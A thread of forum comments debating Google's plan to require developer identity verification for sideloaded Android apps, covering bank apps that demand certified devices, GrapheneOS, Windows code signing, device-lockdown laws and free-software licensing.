They told me that indeed there is no other option. Despite having phone customer support, they had no phone or web banking service at all which could be used without a registered mobile device. The only phone service they could perform was to register a new mobile device, which I didn't have. I had a tablet, but it was too old.
So I had no good choice. The Android phone I'm using right now was bought in a hurry just so I could be allowed to make a bank transaction.
It wasn't my first choice of phone. I didn't have time to investigate alternative devices, let alone weigh up open alternatives. I ended up buying a mid-range device under pressure that seemed ok and was available in a store without waiting. (It was a brand new Samsung, and despite the IP rating it got water damaged and stopped working entirely after a few splashes a year or so later, but I was able to get it repaired.)
I should say that I'm not from the US, so that might be why you haven't heard of it.
There is also an alternative for now, but nothing as simple as SMS or authenticator app. They give you a special credit card shaped card with a card reader that you can use to authenticate with using your PIN, which is mostly considered legacy now with the bank app. It's also not realistic to be carrying this thing around everywhere either as it's bigger than my phone.
There is also a national ID app that is used everywhere that I'm worried will stop working on GrapheneOS... Because without it I won't even be able to access online government services like healthcare, taxes, etc.
I don't know the bank they are referring to, but I can cite an example for me: RBC Royal Bank of Canada requires the mobile app. There is nothing you can do on their website without first 2FA via their specific mobile app, and even then only in limited transaction sizes. If you want "full access" (e.g. up to $10k daily transfer via e-transfer) then you MUST use biometrics and the mobile app.
Unfortunately I have checks to deposit every couple months. And my bank has no physical presence, so the only way I can do it is through the mobile app. (They also accept deposits by mail, but I'm a little wary of that; a lost check would be a huge hassle.)
They don't all work, though: too many crank up the settings on google's various 'integrity' checks and will fail on anything that isn't 100% google-blessed. (Which is insane, because that's all that's required: on a previous phone of mine, it worked fine with a stock ROM with a bluetooth-based RCE, but upgrading to a custom ROM would have meant it was 'insecure')
Is that a jab at GrapheneOS? Because that's just another thing that Google is borking up. And a little bit more so the banks themselves.
GrapheneOS is the way that all phone operating systems SHOULD be made. Layers and segregation between your banking apps and all the privacy breaking trash and malware you can get off the app store.
It is the banks and google making weird rootkit shit to try and lock down things that is the problem here.
My credit union app already wants 24x7 GPS tracking of my location and full access to my camera at all times and full access to my collection of photos, so the app is already dead to me anyway. Demanding that I use it on a locked down device isn't going to change anything for me, I'm already actively not using it. I use the website on a desktop, I rarely need to access my CU at all much less access it remotely.
Given the large amount of battery and bandwidth already used to track my every move, I wish there was something like "Docker for phones" where I could enable and disable 24x7 full access to my every action IRL.
How is GrapheneOS / SeedVault looking these days in terms of being able to capture reliable backups and restore them to another device (without using the cloud)?
I gather the introduction of the android:allowBackup="false" manifest flag complicated things somewhat... I thought I read since then that a Device-to-Device (D2D) impersonation mode was implemented, and would love to hear if that helped?
The crazy thing is this is all under the pretense of preventing malware. And I constantly hear this argument that the app stores protect people, even from developers.
I truly don't get it. Are these people from 2009? Have they seen the apps on the current app stores? If you're lucky your highest rated flashlight app will only have a few Fullscreen ads and a subscription less than $10/mo. The recipe sites from content farms are less bloated and way less scammy.
It's certainly not about preventing scams. It's about preventing competition in the scamming business.
> According to its own survey, Google says that more than 50 times more malware came through internet-sideloaded sources compared with Google Play, where it has required developer verification since 2023.
50:1 is not preventing. It is just "well, we are better than nothing"
I'm pretty sure there can be other curated stores that can serve the customer [1]
[1] customer: owner of phone, not advertisers, data merchants, etc
I regard Google highly in many domains, but this needs independent research. There is just waay too much opportunity to misuse data to paint a picture of themselves as the protectors. Especially curious about their definition of malware, because to me the app stores seem worse than browser toolbars from the 2000s.
I tried to screenshot some app on my android the other day and got an error toast reading some bullshit like "this action has been blocked by the admin." Uh I'm the admin and this is my hardware... The sketchy app was trying to prevent screenshots.
Volla from Germany is one https://volla.online/. They sell a nice set of devices that run either a custom Android or Ubuntu Touch. Their custom Android has a nice bunch of UI and privacy features.
Another one is https://murena.com/ which (IIRC) is based in France. They don't have their own hardware though, they sell partner phones with their ROM preinstalled.
For once Fairphone never updating their phones will work in our favor! If Google rolls this out in early 2026, anyone with a Fairphone can rest easy that they won't receive that version of the operating system until mid-2028 at least.
I have Android 15 on my work phone and 10 in private. I don't really see the difference besides that they've made it more annoying to turn wifi off (requires an extra tap now, first the general internet menu and then a small slider for wifi or mobile data). Genuinely not seeing any significant changes from a user point of view (I'm sure there's lots of new SDKs for the developers, but while I've made apps before, I'm not a mobile dev keeping up with the latest things)
That Fairphone has 13 just tells me they don't waste employee time in their small business on useless upgrades just for the sake of it. Their point is fair wages and ethical mineral mining: better that they have a workable phone without even more fluff, it seems to be tricky enough already in this world :(
Fairphones are also LineageOS and postmarketOS compatible, both options are without tracking and without Google's mandated policies.
LineageOS without gapps is really usable if you set aside the "big" social media apps. WhatsApp can be sourced from their website as an APK. The social apps like facebook, instagram, snap, tiktok and others all require Google Play's tracking services (aka gapps).
For YouTube there's multiple better alternative open source apps available, and mastodon, amethyst and the fediverse apps on f-droid are far superior in terms of performance to the Google Store alternatives.
I'm right there with you. These platforms are cancer. There's a small but growing movement away from smart phones. It'll probably never go mainstream, though.
Start complaining to your government about every shitty thing the apps and OSes do, and tell your friends to do it too, eventually we may get some action on it.
We are all mildly annoyed and therefore mildly motivated to fix the problem. Apple and Google are extremely highly motivated to retain the status quo. I still try to vote with my wallet but it's going to be hard to counter their well-funded lobbyists.
It's also super nice to take notes on the fly for OpenStreetMap with StreetComplete, for holding the device up to the sky and it tells you what planet is so bright in the sky, for navigation... These things don't work on a laptop. Even if you want to carry a full-sized system in place of a smartphone, or use Ubuntu Touch, I'm not aware of software to do these things in the convenient way that Android apps let you
Of course, that's a software support issue and not a constraint imposed by the OS. Someone could make Stellarium desktop work with an orientation sensor. It's just that nobody has done that particular thing, as well as a million other things that work super well on mobile
So is it second-class, or is it just a way that is optimised for output rather than input? You get the turn instructions presented to you, you can watch videos and listen to music, note-taking is optimised to work with a few taps and is reduced to the essentials you need. You can work them out later on computer if you have time at home over of course, but at least you can contribute that way with ease
I think before we can fix all that we need to revert the renting of software via subscriptions and go back to one-time-payment. But people are too greedy for that.
I cut my teeth on commercial b2c & b2b app dev/sales on Palm OS from the age of 14. It was sad but now I'm a full-time bootstrapped iOS dev thanks to that experience.
The entire developer experience was fantastic and the thing that killed it was a lack of desire from the upper leadership when it felt like they couldn't compete with the duopoly.
Did you have a wince app? Too bad, throw away all that and rebuild for wp7.
Do you want to do anything useful? Actually, you better wait for wp7.5.
Oh look, we have a totally new thing with WP8. Upgrade to the newest framework so you can use the WP8 features... Oh, but you still need to build for the old framework for WP7. Hey, how about WP8.1, kind of the same deal.
My personal favorite though was WM10; you now need to build a Universal app that only runs on the very small number of WM10 phones... If you want to run on WP7 and WP8 which still have more sales, a universal app doesn't run there. Also, even though we said WP8 phones would be able to upgrade, either we changed our mind, or the experience is so bad most people won't. And the cherry on top... Users who upgrade from 8 to 10 might need to delete and reinstall the app, otherwise it will just show the loading dots.
Did we mention, we decided we didn't need engineers in Test in the run up to WM10? Couldn't possibly be why the release was terrible.
It's incredible that by the end of it, the WM rollercoaster made us actually miss WinCE. If you had told us that initially, none of us would have believed you. WM had so much potential and was just totally botched.
Heh, I've always done this. Maybe if every mobile dev made sure I could find text like I can in a browser I'd be less strident. But really, I need a very good reason to install stuff.
This is the same direction that Microsoft is taking Windows. Smart App Control is already rolling out to some regions - no .exe will run without a code signing certificate.
It requires a code signing certificate from one of the trusted central authorities, and generally as an individual you must have your legal name on the code signing certificate. It's not pseudonymous.
I really wish Microsoft made it cheaper to get a certificate. With Apple you pay $100 a year for any number of certs. Last I looked into it a cert for a single Windows app costs $400+ per year and requires a hardware token.
The setup is the most insane stupid stuff I've dealt with in a while. I am currently waiting for them to agree that my DUNS number is real, and they made me remove the WHOIS privacy from my domain name to verify that my address is associated with it. The billing receipts from my host were insufficient for reasons they couldn't explain. Had to upgrade to the $30/mo and then the $100/mo support plan just to speak to someone and it's been 4 weeks without movement. But hopefully it will be worth it in the end, the EV certs are crazy expensive and don't even remove smartscreen warnings anymore.
Ugh, sorry to hear that, yeah the whole setup process is just so insanely frustrating. I'm really dreading having to re-validate my identity documents once they expire.
For what it's worth, in my experience it was even worse with EV certs though - all the same steps including removing WHOIS privacy, plus some extra ones like voice phone number validation that had to be repeated every single year.
And then there were extra WTFs with the EV cert expiration being 365 days after an issue date which is several days before you actually receive the hardware token. Or one year they sent the hardware token fairly promptly, but forgot to send the password needed to use it, and it took a week to get a response from support etc. Then again, Azure Trusted Signing has similar ridiculousness with billing being based on calendar months, with no proration for your first month even if you started at the end of the month... I mean it's just $10 but it really adds insult to injury after that signup gauntlet.
Anyway, I've heard that if your Azure Trusted Signing process gets stuck in limbo, it can be best to submit a different document, but I'm not sure if there's any alternative permitted for the DUNS step. That's especially annoying because trying to update outdated info with Dun & Bradstreet is problematic in my experience, i.e. their web forms just plain did not function properly.
Yeah I was with Comodo before and it's like you said. I thought Azure signing was going to be a breeze because I've had my Azure account for years. I submitted with both EIN and DUNS and then they said I can't submit any more validation requests for this "property", so that's why I went the $100/mo support plan to get a human somewhere to click a button and approve this thing.
They saw Apple getting away with notarization under the DMA so they're doing the same.
I must admit the mass demotivation strategy is working really well. Seeing this kind of news every single day, affecting you directly and not even being able to do anything
Yep. I feel powerless, and I don't know what to do. I don't think there is anything I can do, except for watch all of technology get locked down to the point that you need a monopolist's or a government's permission before you do anything with it.
It's so fundamentally depressing, and completely at odds with how I grew up viewing tech.
I predict Windows will end up going this route before Google backtracks on it.
This is the future; partially fuelled by malware, partially fuelled by the desire for platform control, and partially fuelled by government regulation.
As an example of government regulation driving this change, see [1].
This regulation of NSW, Australia considers rooted devices with extra non-Google/non-Apple approved security features such as a duress/wipe PIN (a standard feature of GrapheneOS[2]) as a "dedicated encrypted criminal communication device". How the device is being used doesn't matter. It's how it _could_ be used.
I don't know that it's that simple. Further down that section (1920) in reference [1] reads
"(3) A dedicated encrypted criminal communication device does not include--
(a) a device if--
(i) the device has been designed, modified or equipped with software or security features, and
(ii) a reasonable person would consider the software or security features have been applied for a primary purpose other than facilitating communication between persons involved in criminal activity to defeat law enforcement detection,"
It's not automatic: depending on what a reasonable person thinks and the definition of criminal activity.
> applied for a primary purpose other than facilitating communication between persons involved in criminal activity to defeat law enforcement detection
Does the jurisdiction matter? For example, if an activist was using a device to do things in another country that would be legal in Australia but were crimes in the other country.
I mean, in my country, it's increasingly unclear to me whether things like "loudly criticizing the executive branch" are now considered criminal. Recent executive branch statements on this issue seem to indicate that they may consider some critics criminal just for being critics. But it's hard to be sure. And so far, every critic they've threatened to arrest has also been accused of committing other crimes.
So "the government only considers a duress PIN illegal if it is used to facilitate crime" seems like a potentially tricky standard to apply.
At the pace of regulations we have, one day everything will be forbidden and we will all be criminals just for protecting our own wealth or security from these... yes, from these mafias.
I could use a knife to chop meat, not people; I could use a car to commute, not as a high speed bullet; I could use a gun to eliminate pests, not to kill people. Just because I can use something to do something nefarious doesn't mean it should be banned, or we should not use the Internet at all because it facilitates scammers.
It is always the human mind that dictates the action, not the tool. It is futile to try and ban the tool, and I bet 100% they knew that.
This is uncanny and worryingly specific, and I'm not a lawyer, but if you're not already under suspicion of being a criminal, then installing graphene doesn't match this definition I think
Suspect, they wrote, and that happens all the time. If you go into a store on the way home from work, and 99 days this works fine but the 100th day they want to look in your bag, but you can't show them confidential drawings of the Google Pixel 14 Max that you carry as part of your work, now they'll think you really did steal something and you went from no suspicion (spot check) to definitely a suspect and new things start to apply to you, e.g. if you leave without resolving the suspicion the police might have grounds to enter your house or search you when you walk out next time. The suspicion is based on being a suspect, not on any actual evidence (nobody saw you put anything in your bag)
I mean, you don't really have to speculate about what this is for, it's for an authority providing for lawful search, it seems pretty well-scoped, and similar to any old search warrant, which is not a new thing, really https://classic.austlii.edu.au/au/legis/nsw/consol_act/deccd...
Basically, they're not really setting up for a blanket ban on personal security features, that interpretation is obviously catastrophizing. Not that there aren't hamfisted laws somewhere like this, but NSW's implementation seems OK I guess
Microsoft mismanaged it but there was a potential parallel universe where they were successful at that plan and consumer versions of Windows would be locked to the Microsoft store.
They did a bunch of terrible inept rollouts with confusing technology for both users and developers and effectively shot themselves in the foot. But it did not have to go down that way.
Yep. They fumbled the ball on step 1 of demand aggregation and we got lucky there was nothing of value for the 99% of users that will blindly take the easy path.
> there was a potential parallel universe where they were successful at that plan and consumer versions of Windows would be locked to the Microsoft store.
Sounds like a nightmare universe.
I've got a hobby app in kotlin multiplatform with iOS/Android/Windows/WASM builds and while I have no issues with Apple's App Store or Google Play, I've had nothing but problems trying to support Windows Store.
The MSIX installer format is horrendous to deal with and the certification process for new releases on Windows Store is always far too long and in the cases they do find issues the reports of the issue that they log are entirely worthless.
I ended up just pulling the app off the Windows Store entirely and making it a downloadable *.msi installer. While the extra layer of presumed integrity of the app being on the Microsoft Store would be nice it wasn't remotely worth the effort for the tiny amount of people who were using the Windows version in the first place, especially given the app is free.
> Microsoft has way too much of legacy software people use, banning it all overnight will not go well at all.
A lot of legacy software was killed off with the move to 64-bit Windows. Consumers survived that and for businesses registering their software with MS isn't a problem. They're already handing Microsoft all of their company email, their documents, their spreadsheets, etc. and paying Microsoft for the privilege. MS doesn't care at all about consumers.
They can just require hash of legacy binaries sent to Microsoft and rubberstamped back. Eventually they'll have a near comprehensive list of legacy binaries in common use, and move to block unknown binaries in circulation as "malware".
The malware excuse is just a palatable false pretense. "We have to protect granny!" Of course, she is getting fleeced by plain scam calls, not somehow sideloading apks onto her idevice, but the truth doesn't help advance their narrative.
Imagine that metaphorical granny that in an instant catches fire and turns into ash if the governments and large corporations don't have complete control over our lives.
To put the strongest face on it, by "cracked" youtube, you mean a version that shows the cracker's ads and maybe somehow generates extra clicks (or whatever) so they can get money out of it?
Cracked spotify? In my mind that's just like YouTube, almost entirely server-side. I guess you're talking about hijacking ads here, too? I feel like a "real" crack of Spotify would let you listen to music for free, but that should be impossible (unless their SWE's are incompetent).
You are approaching as if the malicious developer was trying to add useful features for the users.
But in practice, these “apps that lookalike popular apps” are not intended to just be adware-less versions of the popular apps. They are frequently “hide the ads, inject the malware with more permissions” Trojan horses.
I think there is likely a dual motive from Google where they both want to stop malware _and_ stop people blocking youtube ads. The malware problem is real though.
Those "cracked" versions often require extra permissions.
My favorite was a local "discover which of your contacts is on the leaked Covid quarantine list[1]" scam app. It claimed that the extra permission dialogs are just fearmongering by Google, who is in cahoots with big pharma, and wants covid to spread to sell more medications.
[1] In fact, no such leak has ever taken place, its existence was just part of the setup for the scam.
Did she ever get anything side loaded like that? I have downloaded malware by mistake before. Not once were they allowed to proceed with installation. The only way I got anything side loaded was if I installed the first one (which is always Fdroid) deliberately via ADB after I enabled the developer mode.
No I'm not. I asked if anyone likes Windows. These people presumably have no opinion, it's just a means to an end. The closest thing I think you'll get is "I liked Windows 7" or something like that.
Malware is the excuse. Control is the goal. Extracting as much money from people while providing less actual value.
The saddest part is this is to the detriment of literally everyone except a couple rich owners of those companies. And everyone has the right to vote. But western democracy is so indirect the people who understand and care have no way to change the law because their signal is lost in all the noise by those who don't know or don't care.
If the vote came down to people in favor of walled gardens or in favor of forcing companies to open their platforms, with everyone else not voting, it would be a landslide. But there's no way to vote on it this way.
“western democracy is so indirect the people who understand and care have no way to change the law because their signal is lost in all the noise by those who don't know or don't care”
Wow, how fix (WITHOUT intelligence tests as voting requirement) :(
> This is the future; partially fuelled by malware, partially fuelled by the desire for platform control, and partially fuelled by government regulation.
I would say it’s really 50% platform control, 50% government regulation.
Malware is the excuse. I went, without super skill, 40 years while only contracting two viruses ever (one was Kakworm, the other was inert at the time because I was an Amiga user who kept a copy of Scorched Earth on a floppy, which never infected my Amiga).
> I predict Windows will end up going this route before Google backtracks on it.
It will not happen in the next 10 years. Right now people would just make generic launchers and then use them to manually load and execute any binary they please. Options include just writing your thingy in a scripting language and run it in node.exe, python.exe, or compile it to WASM, use native bindings of a scripting language, abuse a random verified electron app, ship with and use a random vulnerable driver, etc etc.
Even remotely getting to the point where locking Windows down to that degree would be possible is going to take MS a long time, fighting friction from users all the way. The whole ecosystem would have to change drastically for that sort of control to even be possible and make sense.
The holes aren't really there because it would be so hard to close them in a vacuum, they're there because decades of software people use rely on things working the old way. People aren't going to switch to a new OS on which almost nothing works anymore.
This is a monopoly with annual gross revenues bigger than all but 42 countries behaving this way.
They have conspired to control the web, browsers, mobile computing, and soon AI. It's sickening how much bad behavior they get away with.
They were able to use YouTube to bludgeon Windows Phone to death and become the de-facto mobile duopoly. Then they were able to get their shitty search engine on all the panes of glass, didn't care one iota about search quality (just ads), but were able to leverage their browser engine control to remove adblocking capabilities.
I hope the DOJ/FTC split Google into a dozen companies.
It is so weird to read comments based on a belief that the current government is aimed at some goal of justice. I guess they're just still drinking the Kool-aid?
Trump was a breath of fresh air talking about frustrations with the status quo that other politicians wouldn't acknowledge. But the only reason he was bringing them up was for use as a cudgel to shake down companies to enrich himself. He will very most certainly go after big tech monopolies and break them up... iff those big tech monopolies don't put bribes into his pocket. As long as his pockets get fatter, then the status quo is just peachy. It's called "making a deal".
I had to do a government ID upload and a live face scan to install my banking app on a new phone even though I had other devices I could have used to authorize it. It made me want to switch banks, but where do you go?
For what it's worth, Venmo will not get access to your biometrics data, it's a black box in which you specify a desired level of authentication and the OS just returns ok/not ok.
It is, however, to make you use Venmo more easily, thus more often, thus spend more money through them.
So people from countries US has sanctioned can't even develop and use mobile apps anymore. This will change millions of innocent lives. So unfair and racist. The reason my people are in this mess in the first place is a US coup.
> developers will have the same freedom to distribute their apps directly to users through sideloading or to use any app store they prefer. We believe this is how an open system should work—by preserving choice while enhancing security for everyone
I guess words don't have meaning anymore, how can you claim to have an open system in an announcement about closing it down?
It's also telling that the big supporters of this are apparently corporations and governments. Admittedly I don't know what "Developer's Alliance" is but they don't seem to care about developers very much, and I wouldn't be surprised if they were just a "pay us to say what you're doing is good for devs" kind of thing
> developers will have the same freedom to distribute their apps directly to users
You have here Google making a statement it can't actually fulfill and one that it knows it can't fulfill. So Google is willfully lying here.
The minute Google has a technical capability to control what applications run on Android it's out of their hands. It is in the hands of courts, governments, dictators and authoritarians. That's just the nature of the world - Google has to obey the law and Google doesn't make the laws.
I guess it sounds hysterical, but in that sense, this is an absolutely massive loss of freedom for the entire planet as communication power that rested with individual choice is now transferred wholesale back to governments by this decision.
The Developer's Alliance address is a coworking space in Washington DC, if you want to rate the likelihood it's just an astroturf for public tech policy wonks.
DO NOT UPLOAD YOUR ID/INFO TO GOOGLE. I put my game on their app store some years ago, and they doxxed me right on the app store. Google posted my name and home address right on the game page. Not great when I was already receiving death threats! Later on, had a rando show up at 3AM one night and had to call the cops out. I moved after that. Google is absolutely not to be trusted to keep this data confidential. If Google demands I do anything with them, I'll just tell my fans to install lineageos or whatever instead -- no way in hell I'm having ANYTHING to do with google ever again. GFY google!
If you are having random people try to attack you while you are at your home, you need to be prepared. Strengthen your door jambs with nine inch screws to replace the screws your door is mounted to and use metal plates to strengthen the locks (there are kits available at home improvement stores), install adherent plastic frosting on your windows that will slow down break ins by making the window much more annoying to break through, and install surveillance cameras outdoors. On the offensive front, you can consider OC/CS grenades you can throw down the hallway to avoid exposing yourself and handheld pepper spray for non-lethal deterrence at moderate range. Finally, if all else fails, keep a loaded handgun in an easy to use but hard for kids to unlock gun box under your drawer next to your bed. An under barrel flash light severely blinds invaders and makes them think twice about charging you, maximizing the chances that nobody will get hurt. The door jamb upgrade is the most important one. I have returned home to a severely beaten door with my shattered iron door knocker on the ground laying in front of the door in pieces but the house was impenetrable to the burglar(s) who weren't willing to break through the glass. It also doesn't hurt to install fake $5 security dome cameras around the property.
If your app is monetized, the contact details of your "business" are shown in the play store. For many smaller developers, this will just be their home address.
That's why you have to have a business address, and get all your business admin ducks in a row, even if it's your first real monetized app. Your future self will always thank you!
I cannot resist the urge to point out that we wouldn't have had this problem if people actually stuck to free software instead of "commercial use friendly" open source licensing
Such a shame that the Free Software Foundation has been such an awful steward of the GPL. The fact that the GPLv3 didn't close the network hole is a decision made either out of myopia or abject cowardice, you shouldn't need a separate license (AGPLv3) to ensure true freedom of the codebase.
That's fair, but a more pervasive Free Software ecosystem might have possibly avoided this outcome entirely. And that failure is something we can lay directly at the feet of the FSF.
If RMS was going to piss off the entire industry with a new version of the GPL, the least he could do was close the network hole. What we got instead is a half measure that satisfies nobody.
More importantly, he completely missed the boat on App Stores. Why was there never any watered down version of copyleft that could be used as a wedge to try and pry open app stores over time? They did it for libraries with the LGPL, but apparently app stores weren't worth special-casing.
In practice we see the reverse and GPL projects being rewritten as more permissive.
The busybox/toybox case looks especially relevant and interesting:
> In January 2012 the proposal of creating a BSD license alternative to the GPL licensed BusyBox project drew harsh criticism (…). Rob Landley, who had started the BusyBox-based lawsuits, responded that this was intentional, explaining that the lawsuits had not benefited the project but that they had led to corporate avoidance, expressing a desire to stop the lawsuits "in whatever way I see fit".
Free choice in the market is a lie anyhow. You are limited by what has actually been made available in the marketplace in sufficient quantity. "You can have any color you want, so long as it is black." - some old racist industrialist.
An interesting idea. But who would have to "stick" to such software? The users?
It seems to me that most of the users do not care much about what kind of software their phone runs, unfortunately. As long as it works with Instagram or whatever other big brand social media is trending these days, they are happy. Which is I think understandable.
The companies developing the apps are in my opinion driving this cultural shift. And they are doing it mostly because it brings them commercial advantages. Which is, I think, also understandable.
Everyone involved seems to do what appears to be in their best interest. And yet, collectively, we as a society get a worse outcome overall. This phenomenon perhaps has a name.
In order to break out of it, I think that the incentives on both sides need to be adjusted. It needs to be in the companies' interest to produce apps as open source. And the users need to want them.
The only way I can think of to achieve that kind of a change is when the open source apps and products become just inherently better than their proprietary alternatives. In all categories. Then, the people would want them. And then the companies will start to produce them.
It is a very tough goal. The commercial apps do not have to be better in all categories to retain their users. They can use vendor locks or other business strategies which restrict the users' ability to leave them.
Open source apps cannot do such things. The only fair ground on which they can compete is their quality.
I'm thinking it's time for a 2nd phone (in my case old one from cupboard) to become the regular daily GrapheneOS enabled driver and then keep a modern Google(tm) updated one at home for all the "official crap" whenever needed. That way I can also separate banking / paypal / etc. from my carry phone with all its various apps that I trust to varying degrees.
This was the first thing that crossed my mind. If it’s not too much money and hassle I could buy a second device for GrapheneOS and tether to the cheapest phone I can get for the official ecosystem.
Really though, it doesn’t have enough impact for consumers. If I get unfairly banned as a developer, no one even notices because that’s nothing more than an opportunity for another developer to step in.
Those are the moments I am starting to fantasize about starting a customer protection group that is sufficiently committed to follow through on organizing boycotts. Naturally, reality hits once you see the average human on the road (on a highway, full speed). We might be lost as a species.
I wonder if you could keep your "snitch" android phone home by instrumentalizing it, enabling you to access it remotely on your main linux/degoogled android phone. It might not even be that outrageous of an idea since there are tons of botfarms that are essentially stacks and stacks of legit phones being remotely controlled... the tech might be there already, just need to adapt it for something good...
How likely is it for google to deny access to all or most of the apis that makes this possible? Then you need to point a camera to the screen, mike the speakers and so on...
Not for me at least, 3DS requires approval in an app on my phone. I'd love if the banks just used TOTP instead but no, I have to use their app, some of which don't work with an unlocked bootloader, so I have to have stock android
I just got a letter from my bank stating this. Website is going away, app only access. It's very disappointing, for security I never have any banking access on my mobile devices
I don't blame Google. Apple escaped anti-trust by simply not allowing anyone except themselves to put software on iPhones. Seriously, Apple doesn't allow competitors so it can't be anti-competitive according to the case.
Totally brain damaged ruling, the judge must have been molested by an Android phone at some point, but here we are, and google is now moving closer to an Apple model.
Time for a Steam Phone. Or FirefoxOS reloaded. The general purpose mobile computing market must be sizeable. I cannot believe everybody just puts up with these increasingly draconic restrictions.
I think a big problem is that the users have been trained to accept the status quo. I mean back in the Feature phone days we would share Java phone games at school via Bluetooth. I’d assume kids these days generally don’t anymore.
Also, due to the cost of physical media piracy was rampant even amongst boomers. People knew and had the option to buy a dvd player that could play video cd because that’s how movies were ripped.
Even during the early iPhones we were so stripped of even basic features that a jailbreak was 100% required if you wanted to do even basic things like taking videos or changing the Home Screen background.
None of this is necessary anymore. The user gets the phone and it just works from their perspective at least.
So who is going to try to run a business off of nerds like us who want to have this sort of control over our devices (I’d call it freedom but the average user doesn’t feel unfree)?
> we would share Java phone games at school via Bluetooth. I’d assume kids these days generally don’t anymore.
I am both happy (from a user-friendliness point of view) and sad (from a "works offline" perspective) that F-Droid's share button now shares a link that will show them info about the app with an option to install the software, instead of the share button directly giving you an APK file with no way to link someone to the 'store' page. I'd personally still know how to send people APKs via hotspot or bluetooth (such as for peer-to-peer voice/message apps) but a lot of people won't
This move from sending each other software to sending each other links to centralized platforms has been long ongoing. Most messaging systems don't allow you to send executable (.exe, .apk, .sh, etc.) files anymore. And I believe that virtually all of them individually do it for your own good, but the combined result is a societal shift
There's an Android app called GPSLogger.[1] It does exactly what it says on the tin. Runners use it to track their own progress. Photographers use it to geotag their own photos.
The thing is, GPS access as a permission is a bit scary. You could imagine some dubious uses for it. Moreover, you could imagine some such dubious uses creating a public relations nightmare for Google. So, Google just forces them out of the Play Store. (Technically, it's a routine renewal, but the GPS permission causes them extra scrutiny, to the point where the author burned out and gave up.[2])
Do we expect that this author should, or for that matter will, give their identity to Google after this? Or is GPSLogger just dead after this change lands?
The attempts to roll out digital ID are similar to the perennial efforts to backdoor encryption. When one push fails, the proponents regroup and formulate a new approach. The recent successes with "age verification" have encouraged digital ID proponents. Expect further encroachments, scaremongering and trial balloons.
Natural incentives exist for tech majors to capture this space.
You paid for the phone with the OS as a contributing factor (alongside the hardware) to the purchase no doubt, so the OS in itself must be compelling to you for some reason.
You didn't fund the development of the OS, contribute to it (presumably), you didn't market it or position it alongside your brand.
I'd agree with you if you said you have a right to run anything on the hardware under a different OS, but you have no god given right to run whatever you want on the OS.
Looking at what's been going on in the E.U. vs. the U.S., it seems pretty clear that one of the only things companies this big, with this much control over the markets fear is regulation.
Maybe people live in a country where adding new regulations is difficult at the moment. In that case, push for it at the state or province level. Push for it wherever you can. Suddenly these companies have to figure out how to work around 50 different state level laws? Painful. Good. Make it hurt to be evil.
People need to come together and push for regulatory roadblocks to things like this at every level. I think that's part of how you keep control of your own property and stand up against it.
It's actually your telco's phone. They're the one that has the license to run the baseband computer and RF transceiver. The 'pad' computer device is sort of yours. But there's no legal way to have ownership of a cell phone unless you yourself bid for and get the RF spectrum and set up your network in a way that accomplishes the FCC coverage and timing requirements. Then run your own telco for your phone. Basically, impossible.
Smart phones try to limit and firewall the interface between the two but tight integration is required for energy efficiency. So a smart phone, or a cell phone, can never be yours. They aren't good choices for doing computing and this legal reality is becoming more and more obvious with time.
As a developer of android apps that get distributed outside of the Play store, a Google identity verification system sounds like a nightmare. What if I'm deemed to be politically incorrect? Will Google brand safety exclude me?
A few years from now: After reviewing the usage of the approved sideloading feature, we discovered no more than 0.01% of users ever sideload an application. For security, sideloading is now disabled on all devices forever.
I'm wondering the same thing in the US. Aside from writing Google and complaining, and purchasing a phone with a different OS (GrapheneOS or PureOS, for example), I'm not sure what else to do.
The issue with that 2nd solution is, "purchasing a phone with GrapheneOS" only registers from Google's perspective as "we just sold an additional Pixel, so we're doing good right now"
Yeah... They just want to ban NewPipe. It's sad to see Android getting locked down, also with the source closing of the development branches, etc. I can as well buy Apple then, it doesn't matter anymore.
You can buy a Linux phone today and make sure the vendors get their food on the table. Software is getting better. If you choose a phone with mainline kernel support (e.g. one that can run Mobian or PureOS), you can literally watch your OS improve month after month.
Alternatively, you can support the user-space ecosystem directly and fund the developers who make it happen.
Donate to Sebastian Krzyszkowiak [0] and Guido Günther [1] if you can!
Every time I read news like this I lose more hope for our world to not end up a Cyberpunk Dystopia. Like, what am I supposed to do? I am just one man. One vote, one guy who isn't even too good at coding.
I wasn't aware of obtainium. Thank you. I was thinking of something more like Google Chrome mobile edition but for APKs. So more focus around the search interface.
The further into this corporatized "vision" of technology we go, the more I relate to the elves in LoTR who basically said "our time is over" and then just leave Middle Earth.
There is no turning back. Generations of developers will grow up thinking every form of communication and technology by virtue of existing needs a corporate groundskeeper. Government identification will be required for most things.
I don't really blame the companies, though. Unfortunately, it actually is the best means to keep a society of the masses functioning more safely online. What makes it all the more sour is that the very idea that things could be different is eroding away, too.
>Unfortunately, it actually is the best means to keep a society of the masses functioning more safely online
Imagine if people felt that way about electrical power distribution? Every single thing you ever plugged in required a license to be validated at the time you tried to use an outlet?
For me, it's obvious that better ways of doing things exist, but I'm weird, and possibly a crank.
The solution, in my opinion, is to do the same thing we do with power in the home... limit the damage that can be done by anything plugged in, only giving away a limited capability for power delivery in a given outlet.
The analogous way to do this in an operating system is to discard the idea of providing all of the computing resources available to every program you run, and limit it in some way. The "permissions flags" we've all come to dread, first with UAC in Microsoft Windows, and now on our phones, obviously suck, and won't work.
The way to do it on a desktop, is to allow the user to choose exactly which resources a program may use, at runtime, by dialog boxes similar to the ones they already use, but with the additional behavior that the operating system enforces their choices, instead of just praying a program operates as intended.
On a phone, I don't have as strong an intuition, but I'm sure it can be worked out, both in a friendly, and secure way that doesn't require full time checking with consent from our betters in the corporate overlord hierarchy.
We can have secure and user friendly compute, both in our desktops, and in all our devices.
It's starting to look like I may end up with two phones. One with Lineage and most of my apps, hopefully, and another one with Play Protect which hopefully will be just my bank app. Google has become way too powerful and is encroaching step by step on our freedom, it's terrible. It's been going on for a long time. It's the IT equivalent of authoritarianism!!
Yeah, I think I will do that strategy as well. I will probably put Graphene on my next phone, and if any apps don't work I will keep them on another phone.
This is how macOS works, without a signature they will tell you they can't guarantee it doesn't have malware and you need to go to settings and choose to run anyway (and most people don't even know about it).
Microsoft would love to do that too, but it just has too much of legacy software to introduce such a major hurdle.
> This is how macOS works, without a signature they will tell you they can't guarantee it doesn't have malware
Even with a signature they can't guarantee it doesn't have malware. The fact that signed malware exists should be enough to put an end to the argument that it's for our own good.
If you had to give away your privacy to use one and could only use helmets authorized by your motorcycle dealer you might have a point. We accept impositions on our freedom all the time when what we get in return is worth the sacrifice. If signed binaries actually delivered on their promise of keeping people safe there'd be a discussion that could be had on whether or not it'd be worthwhile, but since they don't actually protect people we'd be giving up our privacy for nothing.
